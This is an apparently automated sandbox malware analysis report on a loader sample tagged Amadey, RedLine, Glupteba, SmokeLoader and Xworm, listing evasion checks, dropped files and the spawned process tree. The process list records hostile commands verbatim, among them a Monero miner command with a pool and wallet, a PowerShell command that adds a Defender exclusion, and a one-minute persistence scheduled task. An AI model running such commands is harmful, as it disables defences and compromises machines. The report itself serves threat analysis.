Malware Analysis Report

2024-10-19 02:34

Sample ID 240514-bdrt6sdc67
Target 17ee93b40d1746f9d99cf8521a2ab566.bin
SHA256 5a385c25beb70fc35b900bd712aeb9c5065004b5266ea6591c69c225e9bafae4
Tags
amadey glupteba redline smokeloader xworm 1 backdoor dropper evasion execution infostealer loader persistence rat themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5a385c25beb70fc35b900bd712aeb9c5065004b5266ea6591c69c225e9bafae4

Threat Level: Known bad

The file 17ee93b40d1746f9d99cf8521a2ab566.bin was found to be: Known bad.

Malicious Activity Summary

RedLine

Glupteba payload

Detect Xworm Payload

Xworm

Glupteba

SmokeLoader

RedLine payload

Amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Stops running service(s)

Creates new service(s)

Command and Scripting Interpreter: PowerShell

Themida packer

Checks BIOS information in registry

Identifies Wine through registry keys

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-14 01:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-14 01:02

Reported

2024-05-14 01:04

Platform

win7-20240221-en

Max time kernel

26s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"

Signatures

Amadey

trojan amadey

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Xworm

trojan rat xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameService.exe N/A
N/A N/A C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\Temp\127055.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\GameSyncLink\GameService.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\installg.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\installm.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\GameService.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\installc.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\installg.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\installm.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A
File created C:\Program Files (x86)\GameSyncLink\installc.bat C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplons.job C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = [binary certificate blob omitted from this report] C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1784 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 1784 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 1784 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 1784 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 2560 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2560 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2560 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2560 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
PID 2500 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2500 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2500 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2500 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe C:\Windows\SysWOW64\WerFault.exe
PID 2560 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 2560 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 2560 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 2560 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
PID 1816 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 1816 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 1816 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 1816 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe C:\Windows\SysWOW64\WerFault.exe
PID 2560 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2560 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2560 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2560 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 2560 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
PID 2560 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
PID 2560 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
PID 2560 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
PID 964 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 964 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 964 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 964 wrote to memory of 2980 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 964 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 964 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 964 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 964 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 964 wrote to memory of 2188 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\conhost.exe
PID 1856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe C:\Windows\SysWOW64\WerFault.exe
PID 1856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe C:\Windows\SysWOW64\WerFault.exe
PID 1856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe C:\Windows\SysWOW64\WerFault.exe
PID 1856 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe C:\Windows\SysWOW64\WerFault.exe
PID 964 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe
PID 964 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\GameSyncLink\GameService.exe

Processes

C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe

"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"

C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe

"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 116

C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 52

C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"

C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe

"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "

C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe

"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"

C:\Windows\SysWOW64\sc.exe

Sc stop GameServerClient

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameServerClient confirm

C:\Windows\SysWOW64\sc.exe

Sc delete GameSyncLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameSyncLink confirm

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 52

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService start GameSyncLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

"C:\Program Files (x86)\GameSyncLink\GameService.exe"

C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe

"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"

C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"

C:\Windows\Temp\127055.exe

"C:\Windows\Temp\127055.exe" --list-devices

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 52

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "

C:\Windows\SysWOW64\sc.exe

Sc stop GameServerClientC

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameServerClientC confirm

C:\Windows\SysWOW64\sc.exe

Sc delete PiercingNetLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove PiercingNetLink confirm

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService start PiercingNetLink

C:\Program Files (x86)\GameSyncLink\GameService.exe

"C:\Program Files (x86)\GameSyncLink\GameService.exe"

C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"

C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe

"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "

C:\Windows\SysWOW64\sc.exe

Sc delete GameSyncLinks

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService remove GameSyncLinks confirm

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe

"C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"

C:\Program Files (x86)\GameSyncLink\GameService.exe

GameService start GameSyncLinks

C:\Program Files (x86)\GameSyncLink\GameService.exe

"C:\Program Files (x86)\GameSyncLink\GameService.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-359867078-1201342197352886507-1521795268-1586590423-942573878-2093268082-1318655886"

C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe

"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"

C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe

"C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe"

C:\Windows\Temp\728258.exe

"C:\Windows\Temp\728258.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe

"C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe"

C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe

"C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe"

C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe

"C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe"

C:\Users\Admin\Pictures\S0HWF4lnwusjIQO1MqTseA0b.exe

"C:\Users\Admin\Pictures\S0HWF4lnwusjIQO1MqTseA0b.exe"

C:\Users\Admin\Pictures\RxGmeplSAOH7kpj64hcY0qDA.exe

"C:\Users\Admin\Pictures\RxGmeplSAOH7kpj64hcY0qDA.exe" /s

C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe

"C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe"

C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe

"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"

C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe

"C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {3A9B6C6B-CA9B-4DC5-A930-AB37A5188810} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Users\Admin\Pictures\tX8T2gJKxzDcDwjjjrjNMPV9.exe

"C:\Users\Admin\Pictures\tX8T2gJKxzDcDwjjjrjNMPV9.exe"

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\7zS20CA.tmp\Install.exe

.\Install.exe /tEdidDDf "385118" /S

C:\Users\Admin\Pictures\7WRtealACcE9KDLVlx7PIPxc.exe

"C:\Users\Admin\Pictures\7WRtealACcE9KDLVlx7PIPxc.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe'

C:\Windows\SysWOW64\cmd.exe

